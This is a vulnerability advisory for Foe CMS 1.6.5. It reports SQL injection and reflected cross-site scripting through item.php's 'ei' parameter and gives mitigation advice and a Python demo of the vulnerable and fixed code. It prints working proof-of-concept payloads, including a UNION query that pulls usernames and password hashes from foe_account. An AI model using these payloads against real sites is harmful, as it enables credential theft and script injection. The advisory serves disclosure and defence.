Vendor: Foe CMS
Author: flux77
CVSS: 8.8 (HIGH)
Bug class: SQL Injection | Cross Site Scripting
CWE: 89, 79
Product Name: Foe CMS
Affected Version From: 1.6.5
Affected Version To: 1.6.5
Patch Exists: NO
Related CWE: N/A
CPE: a:foecms:foecms:1.6.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2020

Foe CMS 1.6.5 SQL Injection Vulnerability

Foe CMS 1.6.5 passes the 'ei' parameter of item.php straight into a SQL query, so an attacker can inject arbitrary SQL through it (the proof of concept below reads usernames and password hashes out of the foe_account table). The same parameter is also reflected into the page without encoding, so it can be used to inject JavaScript (Cross Site Scripting).

Mitigation:

Treat 'ei' as an integer item id: reject anything that is not a number, and pass the value to the database through a prepared statement (parameterized query) rather than string concatenation. Separately, HTML-encode 'ei' (and any other user-controlled value) before echoing it into the page, for example with htmlspecialchars() in PHP. Escaping special characters is not a substitute for parameterized queries; the two fixes address the two bugs independently.

Exploit-DB raw data:

Title: Foe CMS 1.6.5 SQL Injection Vulnerability 
Vendor: http://foecms.com/
Download: http://code.google.com/p/foecms/downloads/list
Versions: 1.6.5
Platform: linux, windows
Bug: SQL Injection | Cross Site Scripting



-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits


===========
1) Introduction
===========

Category manager (like phpBB3)
Move to object-oriented PHP
account_meta for signature, occupation, avatar, etc. (like WordPress); lets you add and remove fields at will
Rank-based permissions for EVERYTHING
UCP page for changing access permissions (friends and the like)


======
2) Bug
======

SQL Injection
http://victim/[path]/item.php?ei=[SQLi]

Cross Site Scripting
http://victim/[path]/item.php?ei=[XSS]


=====
3) Proof of concept
=====

Example SQLi
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--

Example XSS
http://victim/[path]/item.php?ei=<script>alert(1)</script>
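The following is an added example, not code from the advisory or from Foe CMS, that reproduces the SQL injection above and the mitigation described earlier against an in-memory SQLite database. The foe_item column names and all row contents are constructed; only the column count (nine) and the foe_account columns username and pass_sha are taken from the advisory's payload. The vulnerable handler builds its query by string concatenation exactly as the PoC implies; the fixed handler validates 'ei' as an integer and binds it as a parameter, and the reflected value is HTML-encoded before it reaches the page.

```python
import html
import sqlite3

# Constructed stand-in for the two tables the PoC payload relies on.
# foe_item column names are assumptions; the count (9) is what the payload
# "1,username,pass_sha,1,1,1,1,1,1" needs for UNION to line up.
def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE foe_item (
            id INTEGER PRIMARY KEY, title TEXT, body TEXT,
            c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT
        );
        CREATE TABLE foe_account (
            id INTEGER PRIMARY KEY, username TEXT, pass_sha TEXT
        );
        INSERT INTO foe_item VALUES (1, 'Hello', 'First item', '', '', '', '', '', '');
        -- placeholder hash, not a real Foe CMS value
        INSERT INTO foe_account VALUES (1, 'admin', 'deadbeef0badcafe');
        """
    )
    return db


# The advisory's payload, as it would arrive in item.php?ei=...
SQLI_PAYLOAD = "-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--"
XSS_PAYLOAD = "<script>alert(1)</script>"


def item_vulnerable(db: sqlite3.Connection, ei: str) -> list:
    # 'ei' becomes part of the SQL text: the UNION appends foe_account rows.
    return db.execute(f"SELECT * FROM foe_item WHERE id = {ei}").fetchall()


def item_fixed(db: sqlite3.Connection, ei: str) -> list:
    # Whitelist the type (item ids are integers), then bind the value so the
    # database never parses attacker text as SQL.
    try:
        item_id = int(ei)
    except ValueError:
        return []
    return db.execute("SELECT * FROM foe_item WHERE id = ?", (item_id,)).fetchall()


def render_vulnerable(ei: str) -> str:
    # Reflects the parameter verbatim: the XSS vector.
    return f"<p>Item {ei} not found</p>"


def render_fixed(ei: str) -> str:
    # Encode for the HTML text context before reflecting.
    return f"<p>Item {html.escape(ei)} not found</p>"


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", item_vulnerable(db, SQLI_PAYLOAD))
    print("fixed:     ", item_fixed(db, SQLI_PAYLOAD))
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_fixed(XSS_PAYLOAD))
```

Running it shows the vulnerable query returning the row (1, 'admin', 'deadbeef0badcafe', 1, ...) from foe_account while the fixed query returns nothing for the payload and still finds item 1 for a legitimate id; the encoded render turns the angle brackets into &lt; and &gt; so the browser displays the payload as text instead of executing it.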


=====
4) Credits
=====

flux77
Contact : 0xflux77 at gmail.com